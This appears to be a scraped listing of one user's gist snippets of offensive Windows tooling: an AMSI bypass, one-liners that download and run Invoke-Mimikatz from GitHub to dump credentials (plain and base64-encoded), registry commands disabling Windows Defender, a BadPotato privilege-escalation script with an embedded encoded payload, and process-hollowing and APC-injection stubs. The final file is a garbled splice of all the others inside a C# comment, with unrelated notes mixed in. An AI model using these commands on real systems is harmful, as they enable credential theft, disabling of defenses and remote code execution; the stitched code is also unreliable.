bopin bopin2020

## Hollowing.cs

/***************
 * Simple Process Hollowing in C#
 *
 * #Build Your Binaries
 * 		c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
 *
 *  @author: Michael Gorelik <smgorelik@gmail.com>
 *  gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
 * #Most of the code taken from here: @github: github.com/ambray

## PowerShell Red Team Cheat Sheet.txt
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

## Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ

## exfiltrateYPass.ps1
function Invoke-Mimikatz
{
<#
.SYNOPSIS

This script leverages Mimikatz 2.2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.

This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.

## Possible.log
java -cp .\java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dgs=true .\cs_bin\cobaltstrike.jar .\cs_src\

## C-VariableFields.log
/*
C
const
static
static const 区别
*/

const 表示常量，存储在静态存储区。
static 修饰变量  仅作用在当前文件内

## DInjectQueuerAPC.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

## disablethings.bat
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime

## Invoke-BadPotato.ps1
function Invoke-BadPotato
{

    [CmdletBinding()]
    Param (
        [String]
        $Command = "whoami"

    )
    $a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEAMy9CXxb1ZU4fN+T9PQk27Ikb3Jix3JiJ4pjO7LlTUASy5KcOPEW29lIwFFsJRaxJSHJ2RyDUygFCgVKW7YypdCFtpSBLlBoSynd2ylLS1uYgQy0nUKZdqa0/VM6heQ759z3np68BNpv/t/vi/POveecu5x77rnnnnufZPddeCMzMMaM8Jw9y9hXGP/Xyd753xw8tqpHbexLlh9Xf0Xo/XH1yEQs7U6mEodSkSn3WCQeT2TcB6Lu1HTcHYu7QwPD7qnEeLSxoMBao7QxGGasVzCw5d9fP6q2+xJbyfIEL2MvACJzWvxZAG7MCVw6zItcbsayKesUiI7/DKzzvYzZ6X821RL6VwHtDjDe7n2mRQbpFlj+u9DFwnqa6PRPBnyLDm/MRI9lIG35N16WxiouaGJ/YyqdGoM8lw3GJkFyOrdcJ/xvTEUnE1AwX5GZ2vr1gnJd88UcfJanW6h7E/vKdsbG38O1rPT2d/0r8lrYOonqOtJXQgPWFGSTHhdjVvEDsbL1eakfigpe5xTOlBRBv55ywAqchtSryFoGSH7qd5BN5RtYUvYsB4KnAgHWSnUCMRUH4KkEVPasyGFLukpusOzO0iqrG6eCQKlT8IAmpdkZMBlpBuFlVVgVdG317wJW6jps/tsAOPu6ZhgM7wObT18GtYuMTtOZEtClSJWLJIcx9RtVIOrZKRU7TaWJOSi82iHpungRDNVhdEhu1FDp/GGUJkD1Usn5txpVQf4IwCHNE0I6I4FhS+lqFGglgNrEKhzu1aDMRA1204EN9BsVRadrUUqzbrzzgMPsMCdWY/NmlDh1NdZck6v2h4AGpTy52

## process-hollowing.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;

namespace Hollowing
{
    public class Loader
    {
        public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");

	/***************
	* Simple Process Hollowing in C#
	*
	* #Build Your Binaries
	* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
	*
	* @author: Michael Gorelik <smgorelik@gmail.com>
	* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
	* #Most of the code taken from here: @github: github.com/ambray
	# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# AMSI Bypass (Matt Graeber)
	Normal Version
	------------------------
	[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
	NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!

	#mimikatz [local]
	IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

	#encoded-mimikatz [local]
	powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ
	function Invoke-Mimikatz
	{
	<#
	.SYNOPSIS

	This script leverages Mimikatz 2.2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
	dump credentials without ever writing the mimikatz binary to disk.
	The script has a ComputerName parameter which allows it to be executed against multiple computers.

	This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
	/*
	C
	const
	static
	static const 区别
	*/

	const 表示常量，存储在静态存储区。
	static 修饰变量仅作用在当前文件内
	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace DinjectorWithQUserAPC
	{


	public class Program
	### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
	reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime
	function Invoke-BadPotato
	{

	[CmdletBinding()]
	Param (
	[String]
	$Command = "whoami"

	)
	$a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEAMy9CXxb1ZU4fN+T9PQk27Ikb3Jix3JiJ4pjO7LlTUASy5KcOPEW29lIwFFsJRaxJSHJ2RyDUygFCgVKW7YypdCFtpSBLlBoSynd2ylLS1uYgQy0nUKZdqa0/VM6heQ759z3np68BNpv/t/vi/POveecu5x77rnnnnufZPddeCMzMMaM8Jw9y9hXGP/Xyd753xw8tqpHbexLlh9Xf0Xo/XH1yEQs7U6mEodSkSn3WCQeT2TcB6Lu1HTcHYu7QwPD7qnEeLSxoMBao7QxGGasVzCw5d9fP6q2+xJbyfIEL2MvACJzWvxZAG7MCVw6zItcbsayKesUiI7/DKzzvYzZ6X821RL6VwHtDjDe7n2mRQbpFlj+u9DFwnqa6PRPBnyLDm/MRI9lIG35N16WxiouaGJ/YyqdGoM8lw3GJkFyOrdcJ/xvTEUnE1AwX5GZ2vr1gnJd88UcfJanW6h7E/vKdsbG38O1rPT2d/0r8lrYOonqOtJXQgPWFGSTHhdjVvEDsbL1eakfigpe5xTOlBRBv55ywAqchtSryFoGSH7qd5BN5RtYUvYsB4KnAgHWSnUCMRUH4KkEVPasyGFLukpusOzO0iqrG6eCQKlT8IAmpdkZMBlpBuFlVVgVdG317wJW6jps/tsAOPu6ZhgM7wObT18GtYuMTtOZEtClSJWLJIcx9RtVIOrZKRU7TaWJOSi82iHpungRDNVhdEhu1FDp/GGUJkD1Usn5txpVQf4IwCHNE0I6I4FhS+lqFGglgNrEKhzu1aDMRA1204EN9BsVRadrUUqzbrzzgMPsMCdWY/NmlDh1NdZck6v2h4AGpTy52
	using System;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;
	using System.Text;

	namespace Hollowing
	{
	public class Loader
	{
	public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");